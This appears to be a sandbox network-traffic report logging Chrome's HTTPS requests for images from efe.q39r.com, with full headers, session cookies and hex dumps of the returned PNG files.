                                                                                  2024-04-25 16:23:35 UTC662INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 5b 00 00 02 bc 08 02 00 00 00 bf 53 27 5f 00 00 01 00 69 43 43 50 69 63 63 00 00 18 95 63 60 60 3c c1 00 04 2c 06 0c 0c b9 79 25 45 41 ee 4e 0a 11 91 51 0a ec 0f 18 18 81 10 0c 12 93 8b 0b 18 70 03 a0 aa 6f d7 20 6a 2f eb e2 51 87 0b 70 a6 a4 16 27 03 e9 0f 40 ac 52 04 b4 1c 68 a4 08 90 2d 92 0e 61 6b 80 d8 49 10 b6 0d 88 5d 5e 52 50 02 64 07 80 d8 45 21 41 ce 40 76 0a 90 ad 91 8e c4 4e 42 62 27 17 14 81 d4 f7 00 d9 36 b9 39 a5 c9 08 77 33 f0 a4 e6 85 06 03 69 0e 20 96 61 28 66 08 62 70 67 70 02 f9 1f a2 24 7f 11 03 83 c5 57 06 06 e6 09 08 b1 a4 99 0c 0c db 5b 19 18 24 6e 21 c4 54 16 30 30 f0 b7 30 30 6c 3b 8f 10 43 84 49 41 62 51 22 58 88 05 88 99 d2 d2 18 18 3e 2d 67 60 e0 8d 64 60 10 be c0 c0 c0
                                                                                  Data Ascii: PNGIHDR[S'_iCCPiccc``<,y%EANQpo j/Qp'@Rh-akI]^RPdE!A@vNBb'69w3i a(fbpgp$W[$n!T0000l;CIAbQ"X>-g`d`
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: 1e 54 e9 49 ec ca ea 8f a9 12 e3 d1 63 e4 9f ca 43 4e 4e 1a fe 01 88 5e be 67 03 28 16 0a 00 00 00 01 6f 72 4e 54 01 cf a2 77 9a 00 00 80 00 49 44 41 54 78 da ec fd ed 72 1d d9 b1 35 ea 8d 91 39 ab 16 c0 6e bd 3e 61 47 d8 61 5f a5 af d1 77 74 5e 75 03 ab 6a ce cc e1 1f 59 0b 00 c9 6e 49 2d 69 1f a9 89 7c b6 02 9b 44 83 e0 fa 04 67 56 7e d1 ff bf ff 3f bc 23 00 11 00 8c e3 ed d7 0f 06 20 99 f8 77 90 f4 9b 9f 27 f9 87 be 8f e9 0f 7d 79 6b 9f 5a 20 86 f1 c9 f3 e7 dd ff d7 86 ff fb b3 fd 3f ff d7 fe ff fa c9 ff 3f ff c7 97 ff d7 5f c6 ff fb ff 78 fe 7f 7c f1 ff db cd fe d7 f3 f6 97 a7 b1 1b 37 27 fb 2d d6 5a 6b ad b5 7f 87 7f d7 f9 ff 6f 7c ff 8f df 4a 52 fd 8d 99 59 bf ae 5f bc dd 12 77 b7 f2 9f 7e 64 5a 6b ad b5 d6 5a 6b ed 3f 66 fc de 7f b8 e2 a7 af 3f 07
                                                                                  Data Ascii: TIcCNN^g(orNTwIDATxr59n>aGa_wt^ujYnI-i|DgV~?# w'}ykZ ??_x|7'-Zko|JRY_w~dZkZk?f?
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: 5a 6b ad b5 cf 6b fc a7 6f 40 6b ed 3f af e6 f1 93 24 a9 07 5a 5f 31 69 ad b5 d6 da 9f 06 c9 b7 8f 1f d5 39 e7 6f 7c 7d 9f 78 5a 6b ad b5 d6 5a 6b 9f 57 47 44 ad b5 d6 5a 6b ad b5 4f e7 2d 77 d4 11 51 6b ad b5 d6 5a 6b ed 93 92 d4 11 51 6b ad b5 d6 5a 6b ed 33 aa 34 51 47 44 ad b5 d6 5a 6b ad b5 4f a7 ab e6 5a 6b ad b5 d6 5a 6b ad 23 a2 d6 5a 6b ad b5 d6 da 67 25 a9 f7 11 b5 d6 5a 6b ad b5 d6 7e 04 b5 53 11 1f b6 12 65 e6 ef 7d b1 99 d5 32 c6 ce 11 b5 d6 5a 6b ad b5 d6 3e af 8e 88 5a 6b ad b5 d6 5a 6b 9f 57 47 44 ad b5 d6 5a 6b ad b5 cf ab 23 a2 d6 5a 6b ad b5 d6 da e7 d5 11 51 6b ad b5 d6 5a 6b ed f3 ea 88 a8 b5 d6 5a 6b ad b5 f6 79 75 44 d4 5a 6b ad b5 d6 5a fb bc 3a 22 6a ad 5d 33 fb 6b 84 3f 1f 6a 9c 7f 6b ad b5 d6 da 8f ad 23 a2 d6 5a 6b ad b5 d6 da
                                                                                  Data Ascii: Zkko@k?$Z_1i9o|}xZkZkWGDZkO-wQkZkQkZk34QGDZkOZkZk#Zkg%Zk~Se}2Zk>ZkZkWGDZk#ZkQkZkZkyuDZkZ:"j]3k?jk#Zk
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: c7 1f e3 f9 6d ad b5 7f 4e e7 88 5a 6b ed 73 4a be 27 85 12 bf 93 1a fa e6 e3 9f da 3f 1e 0e fd 20 f7 f7 9b e7 f4 1f f8 d8 5a 6b 9f 53 e7 88 5a 6b ad e1 37 7a 8a ae c9 63 5f 55 ca fd a1 cc c9 7f 5f 50 f1 47 2f 02 fe b9 ab 04 f1 47 67 c7 75 54 d4 5a fb ac 3a 47 d4 5a 6b ed ef fb 31 aa c8 5a 6b ad b5 ef 75 8e a8 b5 d6 3e 05 e9 9b 94 8d 1e 9f ae 5f bc 67 84 8c e3 bb 3f 62 02 f8 48 fa 90 7c fb 08 20 f3 cf 91 4b f9 ee 11 b8 ee c2 37 9f 27 79 dd 35 f2 fb 3f 22 e9 ed 8e ff 97 fb 78 3b bf bf 23 bf f1 c9 3f c9 fd fa ef f4 af bc 2a 7e f3 d9 69 ad fd 1b 7d ff 73 fe 9b cf 74 44 d4 5a 6b 9f c2 77 e7 63 03 05 d2 e4 7a cc 4e 20 20 18 41 11 48 c1 48 3d 16 f5 12 89 84 7e e3 1f 92 3f 8b 4a 73 19 58 f7 48 04 04 11 46 4b a8 3e 43 01 46 08 30 2a 7f e3 6e fe 59 c2 21 00 09 e1
                                                                                  Data Ascii: mNZksJ'? ZkSZk7zc_U_PG/GguTZ:GZk1Zku>_g?bH| K7'y5?"x;#?*~i}stDZkwczN AHH=~?JsXHFK>CF0*nY!
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: 5c e4 db d4 8d ef d8 db 14 8a 8f af 4c 81 7a 7f 55 5a 20 23 22 33 21 ae 8c 80 e0 96 b4 cc 24 b9 bb 85 b0 01 9b 39 4c 29 25 f2 6a 5f c3 c0 e3 e2 82 7d f7 ee f8 18 96 d4 ab e8 ef 1e fa bf ff f9 00 d4 03 71 a5 3a 2b 6d f8 f6 8c c7 d7 95 a2 7c 30 5d 79 51 b7 fa 83 f1 e1 75 6b 8f 57 a9 d9 77 8f cf f7 ef 02 be b7 23 9a be 7a 8c df 83 d5 c7 7b 24 3f fc b7 4c 59 da 87 38 ed fa 6e 1f bf 1e 5f 7d 3d be 0a ea ea fb ff ee 23 a6 fa 99 d4 41 d1 8f ec 9b f4 fe f7 57 bb 3a 22 6a ad b5 1f d1 87 70 28 22 12 0c 71 01 89 5c a1 19 5a a9 19 11 52 fd 76 2e 4d 20 e5 21 65 9d ae 05 20 9d 32 33 37 6c 80 43 2b 31 a4 7d 68 c8 36 87 a7 92 74 6a a4 cc de 22 22 5c 43 0a ea ca 37 1f e7 ac df 4f 9e d4 f9 fe 71 2e c1 df ba 8c fd b1 15 ea bb 86 0d 82 f9 98 0b 01 f1 63 28 22 a0 6a c7 32 15
                                                                                  Data Ascii: \LzUZ #"3!$9L)%j_}q:+m|0]yQukWw#z{$?LY8n_}=#AW:"jp("q\ZRv.M !e 237lC+1}h6tj""\C7Oq.c("j2
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: 5c f5 68 c7 ca aa 33 a4 99 1c dc 37 6c e6 03 99 4e 23 88 2a 10 d5 6f df aa eb f9 b1 eb b1 fa f0 1e f9 ee 17 5f fd b6 ba e0 fe ee 3d fd 07 de 4d ad fd f3 24 75 44 d4 5a 6b 3f 08 be 5f 8b 45 c2 24 2d 30 85 05 2c d9 91 79 ac bc 2f 1d 67 bc 9e eb 8c fc e5 cc 15 3a 57 ac 99 67 ac 2a 1c 4a 58 c4 fb 26 56 07 69 aa e1 09 cf db 70 c3 3e 39 86 3d 0d 3c dd ec 4b 62 ba 9e 12 e1 57 1e 60 33 81 b5 fb 87 94 7e 67 c5 4d f5 f9 fc e6 5d f8 3b 3e 66 87 ea ab 03 8a c4 52 46 c5 5f 8f 03 9f d3 cc 35 40 f0 fa a7 4e b0 c4 aa e9 db 2b 74 ce 7c 9d f9 ba e2 65 45 28 cd 10 e2 40 90 dc 07 b7 e4 9e 18 d5 cf 02 92 fc 50 82 7e c5 1e f9 16 10 bc 5d b7 66 7e 3c c9 1a 2c 7f 3b fc 7b 3b ff 7d d5 17 f1 d5 57 5c 9d 42 f9 a8 14 7a 3f 32 26 ea 6f c9 b7 49 05 75 f7 6a 3a 82 49 75 1f 13 b6 94 2b
                                                                                  Data Ascii: \h37lN#*o_=M$uDZk?_E$-0,y/g:Wg*JX&Vip>9=<KbW`3~gM];>fRF_5@N+t|eE(@P~]f~<,;{;}W\Bz?2&oIuj:Iu+
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: fd ef 97 e3 78 84 46 2b 45 d2 3c 36 e2 e7 9b cf c1 05 83 6d 64 38 cd 58 c3 0d aa 87 cd f0 fe 9e bd 1e 9f df 19 7d fe 7d 29 dd ef bc ce 99 1f be db f5 f9 f7 86 36 7d f7 16 f8 f0 ae f9 aa 81 4f 86 df 1f c7 f7 fb c3 c4 7b ca c2 a7 d6 11 51 6b ad fd 18 de 47 14 48 0a 58 40 0b 9c e2 31 f3 25 f2 65 e5 af f7 f8 f5 88 97 33 8f 19 67 f0 3e 15 f2 48 65 c2 01 af 4d ac a8 74 49 f5 c6 40 82 a0 aa 08 3a 22 98 24 d3 93 51 53 04 4c 29 99 01 c8 cd 6c 33 d5 d9 b6 ea 67 dc b6 6b 4b 09 ab f7 e0 9f bf 66 5b a3 93 6b 3e 59 20 99 4c 32 32 26 b4 42 67 f2 1e 39 43 33 90 12 60 6e 58 ae a0 60 c6 10 3c 4d ac ca ba 50 4e 61 0a 67 f2 4c 9e 89 33 b1 04 43 ce e0 4c 45 32 b2 0a b7 ea 84 44 a1 e6 80 05 e9 35 03 fa 71 bb 0c fc 90 a2 79 3f e2 7d a8 9b fb 9d 89 dc 7f f3 89 7c df e1 f3 ee 6a
                                                                                  Data Ascii: xF+E<6md8X}})6}O{QkGHX@1%e3g>HeMtI@:"$QSL)l3gkKf[k>Y L22&Bg9C3`nX`<MPNagL3CLE2D5qy?}|j
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: f3 7d a2 e0 e3 0f 3f 8e 8c aa b3 1d df b6 42 89 48 d6 a4 0d 26 aa 15 84 aa d2 4a d5 b4 89 c7 b6 59 07 48 d1 61 12 1c 8f 60 2f 61 e2 b7 1f 01 40 79 e5 b2 04 a0 66 39 3c 6a e7 6a a4 47 55 ee 05 67 e4 aa 58 c7 34 66 6e 5b 9e 8b b7 c1 95 70 53 06 d2 a4 1a 0d 97 ac 78 f5 4c fd 3a d7 2f 47 fc 72 c4 af e7 ba 9f 79 5f 01 84 7b fe f4 b4 d1 f1 34 71 2c 9d 43 2b 32 37 af c7 4a 02 c4 a8 6f 12 79 04 ce a5 fb d4 7d e5 6b ad df 52 0c 73 62 1b be 7e b2 5a 1f c4 24 12 4a 3e 0e f7 66 44 d2 1e e1 90 ac 1e 43 49 41 19 51 ed 38 d5 22 47 5a 5e 53 0f af d8 35 c0 14 03 ac da b9 33 b1 2a 54 b3 ea eb b3 05 af fd 60 d5 37 95 30 10 26 c8 e0 bf 55 5f fa 78 1b f0 5f 3c b5 67 d6 f3 c2 48 45 ea 88 3c 02 2f 2b 7f 39 f2 af 47 fc 72 e4 eb 19 33 25 60 0c 9b 83 c3 39 96 1d a1 23 75 4b 5d 49
                                                                                  Data Ascii: }?BH&JYHa`/a@yf9<jjGUgX4fn[pSxL:/Gry_{4q,C+27Joy}kRsb~Z$J>fDCIAQ8"GZ^S53*T`70&U_x_<gHE</+9Gr3%`9#uK]I
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: b4 e8 9f 9c d6 28 22 92 0b 58 e2 99 59 e5 7c af 67 fc 3a e3 7e e2 75 c6 7d e6 cb 5c b1 94 b4 a1 95 d2 ee d8 9c af 33 9e 67 de 3c 6e 8e 99 b6 8b 99 0a 87 3d 66 51 56 2c 04 a0 5e 51 54 5d cb 88 ac 64 da 23 2e aa 08 ff 7d 93 ab 98 8f dc 70 2d 6b aa 11 ff 55 f5 66 55 5b 09 7c 2c c6 33 b3 84 6a ec a3 a4 84 55 e3 da cc 6b 2b 6f ea 51 7a 77 ed 99 cd b7 d1 8b 86 9c f5 57 50 24 fd 71 e3 2b 5b cb ea 88 cb 4e 14 7d 46 6f 97 8d 3a 22 6a ad b5 1f 41 5d 6f 15 98 b8 76 8c d4 3a 94 97 f3 bc af 78 fb df 0a 26 08 73 77 7b 1e fc b2 e1 e7 a7 f1 d3 6d fc b4 db f3 6e 4f 57 2b 11 c1 d4 75 b2 e4 91 38 07 8e e0 be 78 38 a8 4c 59 0d c0 8e 44 28 8f 69 66 da 26 c6 d0 66 1a 03 63 81 8e 5c 39 4c 66 24 6b 78 57 1a 18 d4 48 91 70 b3 91 bc 4e 79 7a 3b 39 89 c9 00 ae dc 48 75 db 67 3e ba
                                                                                  Data Ascii: ("XY|g:~u}\3g<n=fQV,^QT]d#.}p-kUfU[|,3jUk+oQzwWP$q+[N}Fo:"jA]ov:x&sw{mnOW+u8x8LYD(if&fc\9Lf$kxWHpNyz;9Hug>
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: f7 e7 dd 7f fa 32 fe b2 e1 2f 5f 6e 7f 79 f2 2f 83 cf 03 4f 26 47 ee c3 ae e3 05 b9 e4 67 6a c5 38 53 63 ac 31 26 6a b8 30 57 30 d7 91 19 19 11 8b 76 ce b8 93 8e e9 06 37 93 0c c2 b0 34 1b 95 6a a1 b4 d1 9c da 48 38 61 1a f4 6b 2d 4d 8d b0 4b 05 95 d2 5a 11 ab 2e ff 57 b7 bd a2 9a 3a 44 00 a1 cc 15 53 78 3d e3 e5 8c 97 fb f1 72 9f 2f f7 f8 e5 d0 cb d4 4c 65 e6 39 43 37 77 c4 90 39 82 ca 58 a2 3c 33 57 f8 5a 23 22 57 66 64 c6 db ea 7a a6 00 93 23 83 aa d3 aa d6 ba 3a da 57 46 44 9c 2b ee e7 39 85 95 79 2c 9c 2b ce c4 7c 44 2c 95 82 30 d0 0c 1b 31 9c 4f c3 36 e7 6d 70 1f d4 f0 94 85 f9 e6 f4 44 fa 23 69 03 2d e5 0a 9e 73 1d 91 33 78 9f 31 43 47 e8 58 11 a1 19 d7 c5 6f 5e 4d 14 1f 23 22 0e e3 f3 36 dc 78 f3 c0 3e e4 69 4e d4 23 96 ca 5c 6f e1 50 dd 49 c8 de
                                                                                  Data Ascii: 2/_ny/O&Ggj8Sc1&j0W0v74jH8ak-MKZ.W:DSx=r/Le9C7w9X<3WZ#"Wfdz#:WFD+9y,+|D,01O6mpD#i-s3x1CGXo^M#"6x>iN#\oPI


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  48192.168.2.1749762172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:34 UTC1481OUTGET /uvZWUFt0UROOoXt5vmcKSao6QR2TqrxxiF9by3n8nEXUy2s5T34126 HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: image
                                                                                  Referer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQG
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:23:35 UTC644INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:35 GMT
                                                                                  Content-Type: image/png
                                                                                  Content-Length: 231
                                                                                  Connection: close
                                                                                  Content-Disposition: inline; filename="uvZWUFt0UROOoXt5vmcKSao6QR2TqrxxiF9by3n8nEXUy2s5T34126"
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=92GhA3PJ1vuu6db9MycjXetRwuf8NQh9fWo%2BIya0A4BVKBWjezRZwHicp0rmHNM82kpa4oewPiqenXrEhdcNrjZ8pNbqsVKD5FLFXDfj8Z%2FJ9DAFZjeZ4pGUd8NtDg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879fadab2b405084-ATL
                                                                                  2024-04-25 16:23:35 UTC231INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 18 08 06 00 00 00 e0 77 3d f8 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 a1 49 44 41 54 48 4b ed 93 b1 0d 02 31 10 04 e7 5a a0 0c aa b8 12 a8 80 9c 2e 20 23 24 23 a5 94 2d e1 cb 20 24 24 33 b2 f4 48 1f 80 cf bc 71 80 78 a7 3e ed 78 c7 b6 d1 79 59 e7 7c 16 40 68 f8 8f 14 b9 fb 05 18 24 9d 42 2f 93 81 2a 45 63 f8 0a d8 4a ba 7d 15 d0 12 9e 0f 52 6c d0 1a 5e 04 8c e1 1b e0 0c dc 23 2d 92 0e af 66 de 36 70 f7 63 4a 69 67 66 b5 80 fd 47 80 3c 9c 21 c0 7a ce e5 3e 61 e1 2b 6a 85 84 80 d6 26 55 80 09 e4 da e5 a3 45 2f a8 b4 5f dd 60 2e 64 01 84 e6 7e 5f d1 03 bf ca 37 19 0c 18 34 60 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                  Data Ascii: PNGIHDRw=sRGBIDATHK1Z. #$#- $$3Hqx>xyY|@h$B/*EcJ}Rl^#-f6pcJigfG<!z>a+j&UE/_`.d~_74`IENDB`


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  49192.168.2.1749765172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:34 UTC1484OUTGET /opz2A7ILaAyWzSXkUtICNncurtvkgh8DhYFpMx2Oxlzsq9KrZPNl45140 HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: image
                                                                                  Referer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQG
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:23:35 UTC655INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:35 GMT
                                                                                  Content-Type: image/png
                                                                                  Content-Length: 727
                                                                                  Connection: close
                                                                                  Content-Disposition: inline; filename="opz2A7ILaAyWzSXkUtICNncurtvkgh8DhYFpMx2Oxlzsq9KrZPNl45140"
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O%2B9deNKZ%2F1bV9PGlnkMhP55EdsZdU96lFER2UgRclz597hQV8XnAAW6Gq622w5evKHacUt9FRFuWuXKbp4OJg%2FSZFbSt%2FeRLUx5SnlIE7K2xkYt%2BArChHh72FW6%2Fkg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879fadab2fe153de-ATL
                                                                                  2024-04-25 16:23:35 UTC714INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 02 9e 49 44 41 54 68 43 ed 97 81 51 1c 31 0c 45 8f 0e a0 83 a3 03 e8 60 a9 00 a8 20 a4 02 a0 82 90 0a a0 03 ae 83 90 0a b2 54 00 1d e4 3a 80 0e c8 7f 37 72 c6 ec dc ad e5 b5 73 77 3b 59 cf 68 18 f6 64 4b 5f 5f 92 e5 83 d9 c8 d7 c1 c8 fd 9f 4d 00 76 cd e0 c4 c0 c4 40 61 04 fe df 14 6a 9a e6 50 c1 3b 91 9c 4b 1a 09 ff b3 5e 25 ef 92 e7 b6 6d 17 85 01 4e 6e 1f c4 80 9c bf d1 c9 d7 92 79 d2 c2 6c f6 5d 40 ee 1c 7a 83 54 b2 00 58 d4 1f 65 e9 c2 ac b5 44 5a f2 24 59 1a 0b b0 12 98 e1 6f 60 e5 4c 40 60 a6 ea 72 03 30 e7 7f 99 73 38 42 64 1f fa bc 31 a6 ee 4d 87 3d c7 b5 41 e4 00 f8 61 91 27 c7 2f e5 08 11 4f 2e 81 80 05 40 34 12 6d 6b cf 92 9b 32 14 5c 00 a2
                                                                                  Data Ascii: PNGIHDR00WIDAThCQ1E` T:7rsw;YhdK__Mv@ajP;K^%mNnyl]@zTXeDZ$Yo`L@`r0s8Bd1M=Aa'/O.@4mk2\
                                                                                  2024-04-25 16:23:35 UTC13INData Raw: a2 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                  Data Ascii: IENDB`


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  50192.168.2.1749766172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:34 UTC1481OUTGET /mn2YUCVnR8vQa9aF2S75S9IkijyLIGjmjHd6iKoP0ehtuyRPp90150 HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: image
                                                                                  Referer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQG
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:23:35 UTC655INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:35 GMT
                                                                                  Content-Type: image/svg+xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Disposition: inline; filename="mn2YUCVnR8vQa9aF2S75S9IkijyLIGjmjHd6iKoP0ehtuyRPp90150"
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wCDDokD58skli3LX%2FFY9Wsnz4T1T35sBQtPtjGnPrVIlulJaDTtrpt6gW7CRBQ3dAwWzn4D%2FguuI9Joi16icl9znT68Dh9aaxWN8YeCEKRQeP49GddG13XFYHnOIFA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879fadab3b48ad62-ATL
